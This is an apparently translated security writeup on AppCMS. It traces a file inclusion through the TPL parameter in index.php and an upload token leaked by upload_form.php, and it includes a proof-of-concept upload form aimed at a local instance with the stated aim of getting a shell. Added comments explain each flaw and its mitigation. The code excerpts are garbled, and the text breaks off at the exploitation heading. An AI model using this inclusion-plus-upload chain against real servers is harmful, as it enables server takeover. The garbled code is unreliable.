0x01 Code Analysis
See the index.php file.
// index.php (AppCMS) template-selection logic as excerpted in the writeup. The paste is
// collapsed onto one line and its quoting/casing is garbled, so read it for control flow only.
// Security-relevant flow that the excerpt does show:
//  - $TPL is read straight from $_GET['TPL'] (default shown as 'Index'). It is overwritten
//    only when a category template applies (inside the intval($cid) > 0 branch) or when the
//    loaded content row carries a non-empty tpl_content; for every other request the raw
//    query value survives untouched.
//  - $from_mobile, the directory component, is chosen from constants and from
//    $_SERVER['HTTP_HOST'] (prefix 'mkt.'), i.e. partly from a client-supplied header.
//  - The final path is built as '/templates/' . $from_mobile . '/' . $TPL, with '.php'
//    appended unless the string already ends in '.php', then guarded only by file_exists()
//    and handed to require(). There is no allowlist, no character restriction and no check
//    that the resolved path stays inside the templates directory.
// Mitigation: validate $TPL against an allowlist of known template names (or at minimum a
// strict pattern with no '/', '\' or '.'), resolve the candidate with realpath() and refuse it
// unless it begins with the templates directory, and never let the '.php' branch accept a
// caller-supplied extension. Unexpected values in this parameter are worth alerting on in
// web-server logs.
$TPL=isset($_get[' TPL ']?$_get[' TPL ']: ' Index ';//2.1) Judging classification binding templateif(intval($cid) > 0) { $ncate=isset($ccategories[$cid])?$ccategories[$cid]:‘‘; if($ncate= = ") die(' classification does not exist '); if($ncate[' Tpl_listvar ']! = ') {//The list page is not empty, the current page is larger than the first page, and the list page template is replaced $TPL=substr($ncate[' Tpl_listvar '], 0,Stripos($ncate[' Tpl_listvar '], '. ')); } if($ncate[' Tpl_index ']! = ') {//cover page is not empty, the current page is the first page, replaced by a cover sheet template if($p= = 1)$TPL=substr($ncate[' Tpl_index '], 0,Stripos($ncate[' Tpl_index '], '. ')); } } //2.2) Judging categories Under Content page template, information details page, application details page, App history version pageif($TPL= = ' Content_app ') { $c-Update_vistor ($id, 0); $con=$c-Get_content ($id, 0); if(!isset($con[' app_id '])) { die(' Information does not exist '); }} ElseIf($TPL= = ' Content_app_history ') { $c-Update_vistor ($id, 0); $con=$c-Get_content ($id, 0); //exit (Print_r ($con [' history ')]; foreach($con[' History '] as $a) {//determine current app version information if($a[' history_id '] = =$hid) { $history=$a; //Print_r ($history); Continue; } } if(!isset($history)) die(' Historical version data does not exist ');} ElseIf($TPL= = ' Content_info ') { $c-Update_vistor ($id, 1); $con=$c-Get_content ($id, 1); if(!isset($con[' info_id '])) { die(' Information does not exist '); }} if(isset($con) &&$ccategories[$con[' last_cate_id '] [' tpl_content ']! 
= ')$TPL=$ccategories[$con[' last_cate_id '] [' Tpl_content '];//content page top-level category ID judging, navigation bar useif(isset($con)) { $top=$c-Cate_father ($con[' last_cate_id ']); $topid=$top[0] [' cate_id '];} //3) Combination template page Path$from _mobile=TEMPLATE;if(defined(' Content_mobile ') && content_mobile = = 1) {//Adaptive WAP Browsing if($c-From_mobile ()) { $from _mobile=defined(' Wap_tpl ') && wap_tpl? WAP_TPL:m; } } if(defined(' Wap_url ') && wap_url! = ' && '/http '.$_server[' http_host '] = = Wap_url) {//WAP Standalone Domain browsing $from _mobile=Wap_tpl;} if(substr($_server[' Http_host '], 0, 4) = = ' Mkt. ') {//Mobile Client $from _mobile= "MKT";} if(substr($TPL,strlen($TPL) -4, 4) = = '. php ') { $tmp _file= '/templates/'.$from _mobile. ‘/‘ .$TPL;} Else { $tmp _file= '/templates/'.$from _mobile. ‘/‘ .$TPL. '. php ';} if(!file_exists(dirname(__file__) .$tmp _file)) die(' template page does not exist '.$tmp _file);require(dirname(__file__) .$tmp _file);/** * Other action functions start*/
You can see that the `TPL` value passed in is included directly, without any filtering.
But this CMS has no direct upload point, and the front end offers hardly any functionality. So how can this inclusion be taken advantage of? Is including logs or the like the only option? That is too weak. We need to find a way to get a shell.
See /upload/upload_file.php.
// upload/upload_file.php as excerpted in the writeup (collapsed onto one line, quoting garbled).
// What the visible checks actually establish:
//  - $verify comes from the query string ('v'), is decrypted with the UPLOAD_KEY constant and
//    must start with UPLOAD_CODE; the remainder only has to satisfy preg_match('~(\d{10})~', ...),
//    which tests that ten digits are present somewhere. Nothing here compares those digits with
//    the current time, so a token does not expire once obtained, and nothing binds it to a
//    user, session or CSRF token.
//  - $params is taken from the query string, has escaped quotes rewritten by preg_replace()
//    and is json_decode()d with no error check on the result.
//  - The uploaded file name is lowercased and inspected only for '.apk' to choose the save
//    directory. The excerpt stops at the save path, so whatever extension/MIME handling
//    follows is not shown and cannot be judged from here.
// Mitigation: require an authenticated session before accepting an upload, embed an expiry in
// the token and reject stale ones, bind the token to the session, enforce a server-side
// extension and content-type allowlist, and store uploads outside the web root or in a
// directory where script execution is disabled.
$page[' get '] =$_get;$page[' post '] =$_post;$dbm=NewDb_mysql ();$params=$page[' Get '] [' Params '];/** * $params =json_encode (UrlDecode ($params)); * Die (' <script> alert ('. $params. '); </script> '); */$params=Preg_replace(' ~ (\\\ ') ~ ', ' "',$params);$json _params= Json_decode ($params);//1. Verifying Request Security$verify=isset($page[' Get '] [' V '])?$page[' Get '] [' V ']: ';if($verify= = ") die(' <script>alert ("No Access 001");</script> ');$verify= Helper:: Decrypt ($verify,upload_key);$GSC=substr($verify, 0,strlen(Upload_code));if($GSC! = Upload_code) die(' <script>alert (' No Access 002 ').$GSC. ' ");</script> ');if(!Preg_match(' ~ (\d{10}) ~ ',substr($verify,strlen(Upload_code)))) die(' <script>alert (' No Access 003 ').$verify. ' ");</script> ');//2. Receive image upload$save _path= '. '. Upload_path.Date(' y/m/d '). ‘/‘;$file _name=Strtolower($_files[' File '] [' Name ']);if(strstr($file _name, '. apk ')) { $save _path= '. '. (defined(' upload_path_apk ')? upload_path_apk: '/apk/').Date(' y/m/d '). ‘/‘;}$upload _config=Array();$upload _config[' savepath '] =$save _path;//Picture Save Path
`$verify` is what decides whether an upload is allowed, so how do we obtain `$verify`? See upload_form.php.
<!-- upload/upload_form.php as excerpted in the writeup (collapsed onto one line, quoting garbled).
     $verify is generated server-side as helper::encrypt(UPLOAD_CODE . strtotime(date(...)), UPLOAD_KEY)
     and echoed straight into the form's action URL, so whoever can load this page receives a
     token the upload endpoint accepts. Whether core/init.php applies any access control to this
     page is not visible in the excerpt. The token therefore only protects the upload if this page
     is restricted to authenticated users and the consuming endpoint also checks the embedded
     timestamp for freshness. -->
<?PHPrequire_once(dirname(__file__)." /.. /core/init.php "); $upload _server= Site_path. " upload/"; //uploading security validation strings $verify=helper::encrypt (Upload_code.Strtotime(Date(' y-m-d h:i:s ')),Upload_key); $params=$_get[' Params ']; $params=Preg_replace(' ~ (\\\ ') ~ ', ' "',$params); $json=json_decode ($params);?>........<body> <form action= ' <?php Echo ($upload _server);? >upload_file.php?params=<?php Echo UrlEncode ($params);? >&v=<?php Echo ($verify);? > ' id= ' form "name=" form "enctype=" Multipart/form-data "method=" post "target=" Hidden_frame "> <aclass= "Input-file" > Upload <input type= "file" id= "file" name= "file" size= "1" style= "width:70px;cursor:default;height : 25px;line-height:25px; " ></a> <iframe name= "Hidden_frame" id= "Hidden_frame" frameborder= "no" border= "0″marginwidth=" 0″marginhe ight= "0" scrolling= "no" allowtransparency= "yes" ></iframe> </form> </body>The direct echo out of his value, so it's good to run. Our local construction uploads the form.
<!-- Proof-of-concept form from the writeup, pointed at a local test instance and kept verbatim.
     From a defensive viewpoint it illustrates the two server-side gaps described above: the
     token in v is accepted without any session or user binding, and, as the writeup reports,
     the endpoint accepts the post from a page on a different origin. Requiring an
     authenticated session and a per-session CSRF token on upload_file.php closes both. -->
</HTML><Head></Head><Body> <formAction= "Http://127.0.0.1/appcms/upload/upload_file.php?params=&v=tHtAtQScLEskxnAynNEomxsWH"ID= "form"name= "form"enctype= "Multipart/form-data"Method= "POST"Target= "Hidden_frame"><inputtype= ' file 'name= ' file '/><inputtype= ' Submit 'value= ' UploadFile '/><form> </Body></HTML>
Then the file can be uploaded; because there is a callback function, the saved path can be seen in the captured response.
0x02 Exploitation Process